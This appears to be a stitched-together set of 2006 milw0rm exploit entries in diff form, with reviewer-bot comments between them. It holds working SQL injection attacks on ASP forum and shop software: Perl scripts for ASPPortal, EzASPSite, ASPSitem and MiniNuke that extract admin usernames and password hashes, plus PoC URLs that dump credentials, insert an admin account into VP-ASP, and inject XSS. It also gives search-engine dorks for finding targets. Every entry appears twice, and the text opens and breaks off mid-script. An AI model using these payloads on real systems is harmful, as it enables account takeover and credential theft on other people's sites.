||||
if ($answer =~ /string: "(.*?)"]'/) {
|
||||
print "- Exploit succeed! Getting $ARGV[2]'s information\r\n";
|
||||
print "- Username: $ARGV[2]\r\n";
|
||||
print "- Decrypting password....\r\n";
|
||||
$appass = $1;
|
||||
$appass =~ s/(")/chr(34)/eg;
|
||||
$appass =~ s/(<)/chr(60)/eg;
|
||||
$appass =~ s/(>)/chr(62)/eg;
|
||||
$appass =~ s/( )/chr(32)/eg;
|
||||
decrypt();
|
||||
}
|
||||
if ($answer =~ /number of columns/) {
|
||||
print "- This version of ASPPortal is vulnerable too\r\n";
|
||||
print "- but default query of SQL-Inj. does not work on it\r\n";
|
||||
print "- So please edit query by manually adding null data..\r\n";
|
||||
exit();
|
||||
}
|
||||
}
|
||||
#Exploit failed...
|
||||
print "- Exploit failed\n"
|
||||
}
|
||||
|
||||
# milw0rm.com [2006-03-20]
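Review bot: `use Math::BigInt;` is imported but never used; drop it. The four substitutions after `$appass = $1;` (`s/(")/chr(34)/eg` and the `<`, `>` and space variants) replace each character with itself and therefore do nothing; remove them or comment what they were meant to decode. `decrypt()` also documents a root cause the entry should name: the stored password is recovered by XOR-ing each byte against a constant key string copied into the script, i.e. ASPPortal stores passwords reversibly rather than hashed, which is a weakness independent of the injection and belongs in the advisory line. The same `/e` misuse as in the BetaParticle script (`s/(http:\/\/)//eg`) is present, and `$appwd` is built by prepending to an undeclared global.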
@ -1,69 +1,69 @@
#!/usr/bin/perl
|
||||
#Method found & Exploit scripted by nukedx
|
||||
#Contacts > ICQ: 10072 MSN/Main: nukedx@nukedx.com web: www.nukedx.com
|
||||
#Original advisory: http://www.nukedx.com/?viewdoc=22
|
||||
#Usage: ezasp.pl <host> <path>
|
||||
#googledork: [ "Powered By EzASPSite v2.0 RC3" ] 62.400 Pages..
|
||||
use IO::Socket;
|
||||
if(@ARGV != 2) { usage(); }
|
||||
else { exploit(); }
|
||||
sub header()
|
||||
{
|
||||
print "\n- NukedX Security Advisory Nr.2006-22\r\n";
|
||||
print "- EzASPSite <= 2.0 RC3 Remote SQL Injection Exploit\r\n";
|
||||
}
|
||||
sub usage()
|
||||
{
|
||||
header();
|
||||
print "- Usage: $0 <host> <path>\r\n";
|
||||
print "- <host> -> Victim's host ex: www.victim.com\r\n";
|
||||
print "- <path> -> Path to EzASPSite ex: /ezasp/\r\n";
|
||||
exit();
|
||||
}
|
||||
sub exploit ()
|
||||
{
|
||||
#Our variables...
|
||||
$ezserver = $ARGV[0];
|
||||
$ezserver =~ s/(http:\/\/)//eg;
|
||||
$ezhost = "http://".$ezserver;
|
||||
$ezdir = $ARGV[1];
|
||||
$ezport = "80";
|
||||
$eztar = "Default.asp?Scheme=";
|
||||
$ezxp = "-1+UNION+SELECT+0,0,0,password,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,username,0,0,0,0,0,0,0,0,'NWPX',0,0,0,0,0,0,0+from+tblAuthor+where+Group_ID=1";
|
||||
$ezreq = $ezhost.$ezdir.$eztar.$ezxp;
|
||||
#Sending data...
|
||||
header();
|
||||
print "- Trying to connect: $ezserver\r\n";
|
||||
$ez = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$ezserver", PeerPort => "$ezport") || die "- Connection failed...\n";
|
||||
print $ez "GET $ezreq HTTP/1.1\n";
|
||||
print $ez "Accept: */*\n";
|
||||
print $ez "Referer: $ezhost\n";
|
||||
print $ez "Accept-Language: tr\n";
|
||||
print $ez "User-Agent: NukeZilla\n";
|
||||
print $ez "Cache-Control: no-cache\n";
|
||||
print $ez "Host: $ezserver\n";
|
||||
print $ez "Connection: close\n\n";
|
||||
print "- Connected...\r\n";
|
||||
while ($answer = <$ez>) {
|
||||
if ($answer =~ /<link href=\"forum\/(.*?)\" rel=\"stylesheet\"/) {
|
||||
print "- Exploit succeed! Getting admin's information\r\n";
|
||||
print "- USERNAME: $1\r\n";
|
||||
}
|
||||
if ($answer =~ /bgcolor=\"NWPX\" background=\"forum\/(.*?)\">/) {
|
||||
print "- SHA1 HASH of PASSWORD: $1\r\n";
|
||||
exit();
|
||||
}
|
||||
if ($answer =~ /number of columns/) {
|
||||
print "- This version of EzASPSite is vulnerable too\r\n";
|
||||
print "- but default query of SQL-Inj. does not work on it\r\n";
|
||||
print "- So please edit query by manually adding null data..\r\n";
|
||||
exit();
|
||||
}
|
||||
}
|
||||
#Exploit failed...
|
||||
print "- Exploit failed\n"
|
||||
}
|
||||
|
||||
# nukedx.com [2006-03-29]
|
||||
|
||||
# milw0rm.com [2006-03-29]
|
||||
#!/usr/bin/perl
|
||||
#Method found & Exploit scripted by nukedx
|
||||
#Contacts > ICQ: 10072 MSN/Main: nukedx@nukedx.com web: www.nukedx.com
|
||||
#Original advisory: http://www.nukedx.com/?viewdoc=22
|
||||
#Usage: ezasp.pl <host> <path>
|
||||
#googledork: [ "Powered By EzASPSite v2.0 RC3" ] 62.400 Pages..
|
||||
use IO::Socket;
|
||||
if(@ARGV != 2) { usage(); }
|
||||
else { exploit(); }
|
||||
sub header()
|
||||
{
|
||||
print "\n- NukedX Security Advisory Nr.2006-22\r\n";
|
||||
print "- EzASPSite <= 2.0 RC3 Remote SQL Injection Exploit\r\n";
|
||||
}
|
||||
sub usage()
|
||||
{
|
||||
header();
|
||||
print "- Usage: $0 <host> <path>\r\n";
|
||||
print "- <host> -> Victim's host ex: www.victim.com\r\n";
|
||||
print "- <path> -> Path to EzASPSite ex: /ezasp/\r\n";
|
||||
exit();
|
||||
}
|
||||
sub exploit ()
|
||||
{
|
||||
#Our variables...
|
||||
$ezserver = $ARGV[0];
|
||||
$ezserver =~ s/(http:\/\/)//eg;
|
||||
$ezhost = "http://".$ezserver;
|
||||
$ezdir = $ARGV[1];
|
||||
$ezport = "80";
|
||||
$eztar = "Default.asp?Scheme=";
|
||||
$ezxp = "-1+UNION+SELECT+0,0,0,password,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,username,0,0,0,0,0,0,0,0,'NWPX',0,0,0,0,0,0,0+from+tblAuthor+where+Group_ID=1";
|
||||
$ezreq = $ezhost.$ezdir.$eztar.$ezxp;
|
||||
#Sending data...
|
||||
header();
|
||||
print "- Trying to connect: $ezserver\r\n";
|
||||
$ez = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$ezserver", PeerPort => "$ezport") || die "- Connection failed...\n";
|
||||
print $ez "GET $ezreq HTTP/1.1\n";
|
||||
print $ez "Accept: */*\n";
|
||||
print $ez "Referer: $ezhost\n";
|
||||
print $ez "Accept-Language: tr\n";
|
||||
print $ez "User-Agent: NukeZilla\n";
|
||||
print $ez "Cache-Control: no-cache\n";
|
||||
print $ez "Host: $ezserver\n";
|
||||
print $ez "Connection: close\n\n";
|
||||
print "- Connected...\r\n";
|
||||
while ($answer = <$ez>) {
|
||||
if ($answer =~ /<link href=\"forum\/(.*?)\" rel=\"stylesheet\"/) {
|
||||
print "- Exploit succeed! Getting admin's information\r\n";
|
||||
print "- USERNAME: $1\r\n";
|
||||
}
|
||||
if ($answer =~ /bgcolor=\"NWPX\" background=\"forum\/(.*?)\">/) {
|
||||
print "- SHA1 HASH of PASSWORD: $1\r\n";
|
||||
exit();
|
||||
}
|
||||
if ($answer =~ /number of columns/) {
|
||||
print "- This version of EzASPSite is vulnerable too\r\n";
|
||||
print "- but default query of SQL-Inj. does not work on it\r\n";
|
||||
print "- So please edit query by manually adding null data..\r\n";
|
||||
exit();
|
||||
}
|
||||
}
|
||||
#Exploit failed...
|
||||
print "- Exploit failed\n"
|
||||
}
|
||||
|
||||
# nukedx.com [2006-03-29]
|
||||
|
||||
# milw0rm.com [2006-03-29]
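Review bot: the `#googledork:` header line (with a page count) is a discovery aid rather than documentation of the flaw and adds nothing a reader of the entry needs; the header would serve better with the affected parameter (`Default.asp?Scheme=`) and the fix status. In the response loop the label `SHA1 HASH of PASSWORD` is printed without any comment explaining why that match is the password field, so the claim about the hash type is unverifiable from the file. `exit()` inside the `while` loop leaves `$ez` unclosed, there is no `use strict`, and the scheme-stripping substitution again uses the `/e` flag with an empty replacement.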
@ -1,77 +1,77 @@
#!/usr/bin/perl
|
||||
#Method found & Exploit scripted by nukedx
|
||||
#Contacts > ICQ: 10072 MSN/Main: nukedx@nukedx.com web: www.nukedx.com
|
||||
#Original advisory: http://www.nukedx.com/?viewdoc=23
|
||||
#Usage: aspsi.pl <host> <path> <userid>
|
||||
use IO::Socket;
|
||||
if(@ARGV != 3) { usage(); }
|
||||
else { exploit(); }
|
||||
sub header()
|
||||
{
|
||||
print "\n- NukedX Security Advisory Nr.2006-23\r\n";
|
||||
print "- ASPSitem <= 1.83 Remote SQL Injection Exploit\r\n";
|
||||
}
|
||||
sub usage()
|
||||
{
|
||||
header();
|
||||
print "- Usage: $0 <host> <path>\r\n";
|
||||
print "- <host> -> Victim's host ex: www.victim.com\r\n";
|
||||
print "- <path> -> Path to ASPSitem ex: /aspsitem/\r\n";
|
||||
print "- <userid> -> ID of user that you want info ex: 1\r\n";
|
||||
exit();
|
||||
}
|
||||
sub exploit ()
|
||||
{
|
||||
#Our variables...
|
||||
$asserver = $ARGV[0];
|
||||
$asserver =~ s/(http:\/\/)//eg;
|
||||
$ashost = "http://".$asserver;
|
||||
$asdir = $ARGV[1];
|
||||
$asport = "80";
|
||||
$astar = "Haberler.asp?haber=devam&id=";
|
||||
$asxp = "-1%20UNION%20SELECT%20cevap,id,0,kulladi,sifre,kayittarih,email%20FROM%20uyeler%20where%20id%20like%20".$ARGV[2];
|
||||
$asreq = $ashost.$asdir.$astar.$asxp;
|
||||
#Sending data...
|
||||
header();
|
||||
print "- Trying to connect: $asserver\r\n";
|
||||
$as = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$asserver", PeerPort => "$asport") || die "- Connection failed...\n";
|
||||
print $as "GET $asreq HTTP/1.1\n";
|
||||
print $as "Accept: */*\n";
|
||||
print $as "Referer: $ashost\n";
|
||||
print $as "Accept-Language: tr\n";
|
||||
print $as "User-Agent: NukeZilla\n";
|
||||
print $as "Cache-Control: no-cache\n";
|
||||
print $as "Host: $asserver\n";
|
||||
print $as "Connection: close\n\n";
|
||||
print "- Connected...\r\n";
|
||||
while ($answer = <$as>) {
|
||||
if ($answer =~ /class=\"tablo_baslik\"><b>» (.*?)<\/b><\/td>/) {
|
||||
if ($1 == $ARGV[2]) {
|
||||
print "- Exploit succeed! Getting USERID: $ARGV[2]'s credentials\r\n";
|
||||
}
|
||||
else { die "- Exploit failed\n"; }
|
||||
}
|
||||
if ($answer =~ /\" align=\"left\">(.*?)</) {
|
||||
print "- Username: $1\r\n";
|
||||
}
|
||||
if ($answer =~ /Ekleyen \(<b>(.*?)<\/b>\)/) {
|
||||
print "- MD5 HASH of PASSWORD: $1\r\n";
|
||||
}
|
||||
if ($answer =~ /\| (.*?) ]<br>/) {
|
||||
print "- Regdate: $1\r\n";
|
||||
}
|
||||
if ($answer =~ /haber=yorum&id=(.*?)\">Yorumlar/) {
|
||||
print "- Email: $1\r\n";
|
||||
}
|
||||
if ($answer =~ / Okunma : (.*?) /) {
|
||||
print "- MD5 hash of answer: $1\r\n";
|
||||
exit();
|
||||
}
|
||||
}
|
||||
#Exploit failed...
|
||||
print "- Exploit failed\n"
|
||||
}
|
||||
|
||||
#nukedx.com [2006-04-19]
|
||||
|
||||
# milw0rm.com [2006-04-19]
|
||||
#!/usr/bin/perl
|
||||
#Method found & Exploit scripted by nukedx
|
||||
#Contacts > ICQ: 10072 MSN/Main: nukedx@nukedx.com web: www.nukedx.com
|
||||
#Original advisory: http://www.nukedx.com/?viewdoc=23
|
||||
#Usage: aspsi.pl <host> <path> <userid>
|
||||
use IO::Socket;
|
||||
if(@ARGV != 3) { usage(); }
|
||||
else { exploit(); }
|
||||
sub header()
|
||||
{
|
||||
print "\n- NukedX Security Advisory Nr.2006-23\r\n";
|
||||
print "- ASPSitem <= 1.83 Remote SQL Injection Exploit\r\n";
|
||||
}
|
||||
sub usage()
|
||||
{
|
||||
header();
|
||||
print "- Usage: $0 <host> <path>\r\n";
print "- <host> -> Victim's host ex: www.victim.com\r\n";
print "- <path> -> Path to ASPSitem ex: /aspsitem/\r\n";
print "- <userid> -> ID of user that you want info ex: 1\r\n";
exit();
}
sub exploit ()
{
#Our variables...
$asserver = $ARGV[0];
$asserver =~ s/(http:\/\/)//eg;
$ashost = "http://".$asserver;
$asdir = $ARGV[1];
$asport = "80";
$astar = "Haberler.asp?haber=devam&id=";
$asxp = "-1%20UNION%20SELECT%20cevap,id,0,kulladi,sifre,kayittarih,email%20FROM%20uyeler%20where%20id%20like%20".$ARGV[2];
$asreq = $ashost.$asdir.$astar.$asxp;
#Sending data...
header();
print "- Trying to connect: $asserver\r\n";
$as = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$asserver", PeerPort => "$asport") || die "- Connection failed...\n";
print $as "GET $asreq HTTP/1.1\n";
print $as "Accept: */*\n";
print $as "Referer: $ashost\n";
print $as "Accept-Language: tr\n";
print $as "User-Agent: NukeZilla\n";
print $as "Cache-Control: no-cache\n";
print $as "Host: $asserver\n";
print $as "Connection: close\n\n";
print "- Connected...\r\n";
while ($answer = <$as>) {
if ($answer =~ /class=\"tablo_baslik\"><b>» (.*?)<\/b><\/td>/) {
if ($1 == $ARGV[2]) {
print "- Exploit succeed! Getting USERID: $ARGV[2]'s credentials\r\n";
}
else { die "- Exploit failed\n"; }
}
if ($answer =~ /\" align=\"left\">(.*?)</) {
print "- Username: $1\r\n";
}
if ($answer =~ /Ekleyen \(<b>(.*?)<\/b>\)/) {
print "- MD5 HASH of PASSWORD: $1\r\n";
}
if ($answer =~ /\| (.*?) ]<br>/) {
print "- Regdate: $1\r\n";
}
if ($answer =~ /haber=yorum&id=(.*?)\">Yorumlar/) {
print "- Email: $1\r\n";
}
if ($answer =~ / Okunma : (.*?) /) {
print "- MD5 hash of answer: $1\r\n";
exit();
}
}
#Exploit failed...
print "- Exploit failed\n"
}

#nukedx.com [2006-04-19]

# milw0rm.com [2006-04-19]

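Review bot: the usage text at the top of this hunk (`print "- Usage: $0 <host> <path>\r\n";`) omits the third argument even though the help line right below documents `<userid>` and `exploit()` reads it as `$ARGV[2]` when building `$asxp`; the usage line should read `<host> <path> <userid>`. Two smaller points in the same function: `s/(http:\/\/)//eg` asks Perl to eval an empty replacement (the `e` flag does nothing useful and should go), and the GET request is written with bare `\n` line terminators (`"GET $asreq HTTP/1.1\n"`, `"Connection: close\n\n"`) while HTTP/1.1 specifies CRLF, so strict servers will reject it; the `\r\n` used on the console output lines is the form the request needs. The success check `if ($1 == $ARGV[2])` also compares the scraped `<b>» ...</b>` title numerically, so a non-numeric title silently compares as 0 rather than failing; `eq` against the expected id would be the honest test.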
@ -1,18 +1,18 @@
# BK Forum <= 4.0 Remote SQL Injection
# by n0m3rcy
# Copyright (c) 2006 n0m3rcy <n0m3rcy@bsdmail.org>
# Exploit:

First you must be logged in
Then type this in your browser

http://www.site.com/path/member.asp?id=-1%20UNION%20SELECT%201,memName,3,4,5,6,7,8,9,10,11,memPassword,13,14,15,16%20FROM%20member+where+memID=1

You will find admin's password

# Shoutz:
nukedx , nukedx , nukedx :) , cijfer , str0ke , Devil-00

# Have phun!

# milw0rm.com [2006-04-24]
# BK Forum <= 4.0 Remote SQL Injection
# by n0m3rcy
# Copyright (c) 2006 n0m3rcy <n0m3rcy@bsdmail.org>
# Exploit:

First you must be logged in
Then type this in your browser

http://www.site.com/path/member.asp?id=-1%20UNION%20SELECT%201,memName,3,4,5,6,7,8,9,10,11,memPassword,13,14,15,16%20FROM%20member+where+memID=1

You will find admin's password

# Shoutz:
nukedx , nukedx , nukedx :) , cijfer , str0ke , Devil-00

# Have phun!

# milw0rm.com [2006-04-24]

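Review bot: the two halves of this hunk are byte-identical as rendered (no `+`/`-` markers survive), so the change can only be a line-ending or encoding normalisation of the file and carries no content change to review. On the PoC itself: `where+memID=1` hard-codes the first member row, and the sentence "You will find admin's password" only holds when the admin account happened to be the first one created; the useful information here is the column layout (16 fields, `memName` in position 2, `memPassword` in position 12), and the writeup should also say whether `memPassword` is stored hashed or in clear, since "First you must be logged in" already makes this an authenticated-only finding.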
@ -1,30 +1,30 @@
VP-ASP 6.00 SQL Injection / Exploit by tracewar(tracewar@gmail.com)

people claimed there is some underground sploit for vp-asp 6.00 and I was sure that
if a sploit really exist in the ug i can find the bug and make a small hack for it ^^
well it didn't take me more then 5 minutes to find a bug in vp-asp.

* the vendor was already notified.

p.s. before we get to the bug/hack.. I'm not responsible for any illegal actions
taken by people using the information in this document, if you don't agree please stop reading
and close this text document asap.

* this information is for educational purposes only!

----

The SQL Injection bug is in the shopcurrency.asp file under the "cid" query.

quick hack to add user a/a:

/shopcurrency.asp?cid=AUD';insert into tbluser ("fldusername","fldpassword","fldaccess") values ('a','a','1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29')--

and for those of you that don't know sql at all
this is how you remove the user 'a':

/shopcurrency.asp?cid=AUD';delete from tbluser where fldusername='a'--

-tracewar

# milw0rm.com [2006-05-06]
VP-ASP 6.00 SQL Injection / Exploit by tracewar(tracewar@gmail.com)

people claimed there is some underground sploit for vp-asp 6.00 and I was sure that
if a sploit really exist in the ug i can find the bug and make a small hack for it ^^
well it didn't take me more then 5 minutes to find a bug in vp-asp.

* the vendor was already notified.

p.s. before we get to the bug/hack.. I'm not responsible for any illegal actions
taken by people using the information in this document, if you don't agree please stop reading
and close this text document asap.

* this information is for educational purposes only!

----

The SQL Injection bug is in the shopcurrency.asp file under the "cid" query.

quick hack to add user a/a:

/shopcurrency.asp?cid=AUD';insert into tbluser ("fldusername","fldpassword","fldaccess") values ('a','a','1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29')--

and for those of you that don't know sql at all
this is how you remove the user 'a':

/shopcurrency.asp?cid=AUD';delete from tbluser where fldusername='a'--

-tracewar

# milw0rm.com [2006-05-06]

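Review bot: the injected `';insert into tbluser (...) values (...)--` depends on stacked statements and `--` line comments, which is SQL Server syntax, and the writeup never names the backend; a Jet/Access database behind the same `shopcurrency.asp` would execute neither, so readers should expect the PoC to fail there. `fldaccess` is set to the literal string `'1,2,3,...,29'` with no explanation of which rights those numbers grant, and "the vendor was already notified" gives no date or fixed version, both of which a reader of this file would want. The double-quoted column names in `("fldusername","fldpassword","fldaccess")` are quoted identifiers, which is fine on SQL Server with the default QUOTED_IDENTIFIER setting but is another backend assumption. The two rendered copies of the file are identical, so this hunk is a whitespace or encoding change only.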
@ -1,21 +1,21 @@
Zix Forum <= 1.12 (layid) SQL Injection Vulnerability


Vulnerability:
--------------------
SQL_Injection:
Input passed to the "layid" parameter in 'settings.asp' not properly sanitised before being used in a SQL query.
This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.
Successful exploitation extracts username and password of administrator in clear text .


Proof of Concepts:
--------------------
site.com/zix/login.asp?layid=-1%20union%20select%201,null,null,1,1,1,1,null,1,1,J_User,null,1,1,1,1,1,J_Pass,null,null,null,null,1,1,1,1,1,1,1,1,1,1,1,1,1,1,null%20from%20adminLogins where approve=1 and '1'='1'
site.com/zix/main.asp?layid=-1%20union%20select%201,null,null,null,1,1,1,null,1,1,J_User,null,1,1,1,1,1,J_Pass,null,null,null,null,1,1,1,1,1,1,1,1,1,1,1,1,1,null,null%20from%20adminLogins where approve=1 and '1'='1'

-------

By FarhadKey On 19 May 2006

# milw0rm.com [2006-05-19]
Zix Forum <= 1.12 (layid) SQL Injection Vulnerability


Vulnerability:
--------------------
SQL_Injection:
Input passed to the "layid" parameter in 'settings.asp' not properly sanitised before being used in a SQL query.
This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.
Successful exploitation extracts username and password of administrator in clear text .


Proof of Concepts:
--------------------
site.com/zix/login.asp?layid=-1%20union%20select%201,null,null,1,1,1,1,null,1,1,J_User,null,1,1,1,1,1,J_Pass,null,null,null,null,1,1,1,1,1,1,1,1,1,1,1,1,1,1,null%20from%20adminLogins where approve=1 and '1'='1'
site.com/zix/main.asp?layid=-1%20union%20select%201,null,null,null,1,1,1,null,1,1,J_User,null,1,1,1,1,1,J_Pass,null,null,null,null,1,1,1,1,1,1,1,1,1,1,1,1,1,null,null%20from%20adminLogins where approve=1 and '1'='1'

-------

By FarhadKey On 19 May 2006

# milw0rm.com [2006-05-19]

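Review bot: the description locates the unsanitised `layid` parameter in `settings.asp`, but both proofs of concept target `login.asp` and `main.asp`; the advisory should name the file that actually builds the query, or list all three if each passes `layid` through unfiltered. Both PoCs are 37-column UNIONs that place `J_User` in position 11 and `J_Pass` in position 18 but differ in which slots are `null`, so whoever reproduces this needs both variants, and the tail `where approve=1 and '1'='1'` is left with raw spaces while the rest of the URL is `%20`-encoded. "In clear text" is a claim about how `J_Pass` is stored that nothing in the hunk substantiates. The two rendered copies are identical, so the change is whitespace or encoding only.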
@ -1,11 +1,11 @@
# Title : qjForum(member.asp) SQL Injection Vulnerability
# Author : ajann
# greetz : Nukedx,TheHacker
# Dork : "qjForum"
# Exploit:

# Login before injection.

### http://target/[path]/member.asp?uName='union%20select%200,0,0,username,0,0,pd,email,0,0,0,0,0,0,0,0,0,0,0,0%20from%20member

# milw0rm.com [2006-05-26]
# Title : qjForum(member.asp) SQL Injection Vulnerability
# Author : ajann
# greetz : Nukedx,TheHacker
# Dork : "qjForum"
# Exploit:

# Login before injection.

### http://target/[path]/member.asp?uName='union%20select%200,0,0,username,0,0,pd,email,0,0,0,0,0,0,0,0,0,0,0,0%20from%20member

# milw0rm.com [2006-05-26]

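Review bot: the payload `uName='union%20select%20...%20from%20member` opens a string literal with `'` but neither closes it nor comments out the remainder of the original query, so it only parses if `member.asp` appends nothing after the parameter value; the advisory should show the surrounding query so a reader can tell whether a dangling closing quote is left behind. The 20-column SELECT exposes `username`, `pd` and `email`, yet nothing says what `pd` holds (a clear-text password or a hash), and `# Login before injection.` makes this an authenticated finding, which the title should reflect. Both rendered copies are identical, so the hunk is a whitespace or encoding change only.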
@ -1,49 +1,49 @@
ENGLISH
# Title : Easy-Content Forums 1.0 Multiple SQL/XSS Vulnerabilities
# Dork : "Copyright 2004 easy-content forums"
# Author : ajann
# Exploit;

SQL INJECT.ON--------------------------------------------------------
### http://[target]/[path]/userview.asp?startletter=SQL TEXT
### http://[target]/[path]/topics.asp?catid=1'SQL TEXT =>catid=x

Example:
http://[target]/[path]/topics.asp?catid=1 union+select+0,password,0,0,0,0,0,0,0,0+from+tbl_forum_users

XSS--------------------------------------------------------
### http://[target]/[path]/userview.asp?startletter=xss TEXT
### http://[target]/[path]/topics.asp?catid=30&forumname=XSS TEXT

Example:
http://[target]/[path]/topics.asp?catid=30&forumname=%22%3E%3Cscript%3Ealert%28%27X%27%29%3B%3C%2Fscript%3E%22%3E%3Cscript%3Ealert%28%27X%27%29%3B%3C%2Fscript%3E == X




TURKISH
# Ba.l.k : Easy-Content Forums 1.0 Multiple SQL/XSS Vulnerabilities
# Sözcük[Arama] : "powered by phpmydirectory"
# Aç... Bulan : ajann
# Aç.k bulunan dosyalar;

SQL INJECT.ON--------------------------------------------------------
### http://[target]/[path]/userview.asp?startletter=SQL SORGUNUZ
### http://[target]/[path]/topics.asp?catid=1'SQL SORGUNUZ =>catid=De.i.ken

Örnek:
http://[target]/[path]/topics.asp?catid=1 union+select+0,password,0,0,0,0,0,0,0,0+from+tbl_forum_users

XSS--------------------------------------------------------

### http://[target]/[path]/userview.asp?startletter=XSS KODLARINIZ
### http://[target]/[path]/topics.asp?catid=30&forumname=XSS KODLARINIZ

Örnek:
http://[target]/[path]/topics.asp?catid=30&forumname=%22%3E%3Cscript%3Ealert%28%27X%27%29%3B%3C%2Fscript%3E%22%3E%3Cscript%3Ealert%28%27X%27%29%3B%3C%2Fscript%3E Ekrana X uyar.s. c.kar.cakt.r.

Ac.klama:
userview.asp , topics.asp dosyalar.nda bulunan filtreleme eksikli.i nedeniyle sql sorgu cal.st.r.labilmektedir.
userview.asp , topics.asp dosyalar.nda bulunan filtreleme eksikli.i nedeniyle xss kodlar. cal.sabilmektedir.

# milw0rm.com [2006-05-26]
ENGLISH
# Title : Easy-Content Forums 1.0 Multiple SQL/XSS Vulnerabilities
# Dork : "Copyright 2004 easy-content forums"
# Author : ajann
# Exploit;

SQL INJECT.ON--------------------------------------------------------
### http://[target]/[path]/userview.asp?startletter=SQL TEXT
### http://[target]/[path]/topics.asp?catid=1'SQL TEXT =>catid=x

Example:
http://[target]/[path]/topics.asp?catid=1 union+select+0,password,0,0,0,0,0,0,0,0+from+tbl_forum_users

XSS--------------------------------------------------------
### http://[target]/[path]/userview.asp?startletter=xss TEXT
### http://[target]/[path]/topics.asp?catid=30&forumname=XSS TEXT

Example:
http://[target]/[path]/topics.asp?catid=30&forumname=%22%3E%3Cscript%3Ealert%28%27X%27%29%3B%3C%2Fscript%3E%22%3E%3Cscript%3Ealert%28%27X%27%29%3B%3C%2Fscript%3E == X




TURKISH
# Ba.l.k : Easy-Content Forums 1.0 Multiple SQL/XSS Vulnerabilities
# Sözcük[Arama] : "powered by phpmydirectory"
# Aç... Bulan : ajann
# Aç.k bulunan dosyalar;

SQL INJECT.ON--------------------------------------------------------
### http://[target]/[path]/userview.asp?startletter=SQL SORGUNUZ
### http://[target]/[path]/topics.asp?catid=1'SQL SORGUNUZ =>catid=De.i.ken

Örnek:
http://[target]/[path]/topics.asp?catid=1 union+select+0,password,0,0,0,0,0,0,0,0+from+tbl_forum_users

XSS--------------------------------------------------------

### http://[target]/[path]/userview.asp?startletter=XSS KODLARINIZ
### http://[target]/[path]/topics.asp?catid=30&forumname=XSS KODLARINIZ

Örnek:
http://[target]/[path]/topics.asp?catid=30&forumname=%22%3E%3Cscript%3Ealert%28%27X%27%29%3B%3C%2Fscript%3E%22%3E%3Cscript%3Ealert%28%27X%27%29%3B%3C%2Fscript%3E Ekrana X uyar.s. c.kar.cakt.r.

Ac.klama:
userview.asp , topics.asp dosyalar.nda bulunan filtreleme eksikli.i nedeniyle sql sorgu cal.st.r.labilmektedir.
userview.asp , topics.asp dosyalar.nda bulunan filtreleme eksikli.i nedeniyle xss kodlar. cal.sabilmektedir.

# milw0rm.com [2006-05-26]

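Review bot: the Turkish half's search string `# Sözcük[Arama] : "powered by phpmydirectory"` names a different product and contradicts the English `# Dork : "Copyright 2004 easy-content forums"` a few lines above; it reads like a template left over from another advisory and should match the English dork. The Turkish text is also mis-encoded in the file itself: the letters ı, ş and ğ have become `.` (`Ba.l.k` for Başlık, "Title"; `Aç... Bulan` for Açığı Bulan, "Found by"; `Aç.k bulunan dosyalar` for "Vulnerable files"; `SQL SORGUNUZ` / `XSS KODLARINIZ` for "your SQL query" / "your XSS code"; `Ekrana X uyar.s. c.kar.cakt.r.` for "will pop an alert box reading X"; `Ac.klama` for "Explanation"), and the two closing sentences say that because of missing filtering in userview.asp and topics.asp, SQL queries can be executed and XSS code can run. The English half carries the same two PoCs, a 10-column UNION against `tbl_forum_users` and a reflected XSS through `forumname`, so nothing is lost, but the encoding should be fixed at the source rather than carried forward. Both rendered copies are identical, so this hunk changes whitespace or encoding only.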
@ -1,7 +1,7 @@
# Title : PrideForum 1.0 (forum.asp) Remote SQL Injection Vulnerability
# Author : ajann

# Exploit Example:
http://[target]/[path]/forum.asp?H_ID=1%20union+select+0,0,ID,J_User,0,0,0,J_Pass,ID,0+from+adminlogins+where+ID=1&Name=Allm%E4nt

# milw0rm.com [2006-05-27]
# Title : PrideForum 1.0 (forum.asp) Remote SQL Injection Vulnerability
# Author : ajann

# Exploit Example:
http://[target]/[path]/forum.asp?H_ID=1%20union+select+0,0,ID,J_User,0,0,0,J_Pass,ID,0+from+adminlogins+where+ID=1&Name=Allm%E4nt

# milw0rm.com [2006-05-27]

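Review bot: the single PoC ends in `&Name=Allm%E4nt` (Latin-1 for "Allmänt"), and nothing says whether `forum.asp` requires a `Name` parameter or whether this is just the category name from the author's test install; either document it or drop it, because a reader copying the URL onto another install will not know which. The 10-column UNION pulls `J_User` and `J_Pass` for `ID=1` from `adminlogins` and lists `ID` twice, which is fine for matching column types but is worth a word; the same `adminlogins`/`J_User`/`J_Pass` schema appears in the Zix Forum file above, suggesting a shared code base, which would be useful context. Both rendered copies are identical, so this hunk is a whitespace or encoding change only.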
@ -1,204 +1,204 @@
#!/usr/bin/perl
#Method found & Exploit scripted by nukedx
#Contacts > ICQ: 10072 MSN/Main: nukedx@nukedx.com web: www.nukedx.com
#Original advisory: http://www.nukedx.com/?viewdoc=31
#Usage: mini.pl <host> <path> <user> <pass> <mail>
use IO::Socket;
if(@ARGV != 5) { usage(); }
else { exploit(); }
sub header()
{
print "\n- NukedX Security Advisory Nr.2006-31\r\n";
print "- MiniNuke v2.x Remote SQL Injection (create an admin) Exploit\r\n";
}
sub usage()
{
header();
print "- Usage: $0 <host> <path> <user> <pass> <mail>\r\n";
print "- <host> -> Victim's host ex: www.victim.com\r\n";
print "- <path> -> Path to MiniNuke ex: /mininuke/\r\n";
print "- <user> -> Desired username to create ex: h4x0r\r\n";
print "- <pass> -> Password for our username ex: p4ZZw0rd\r\n";
print "- <mail> -> Mail for our username ex: hax0r\@s3x0r3d.com\r\n";
exit();
}
sub exploit ()
{
#Our variables...
$mnserver = $ARGV[0];
$mnserver =~ s/(http:\/\/)//eg;
$mnhost = "http://".$mnserver;
$mndir = $ARGV[1];
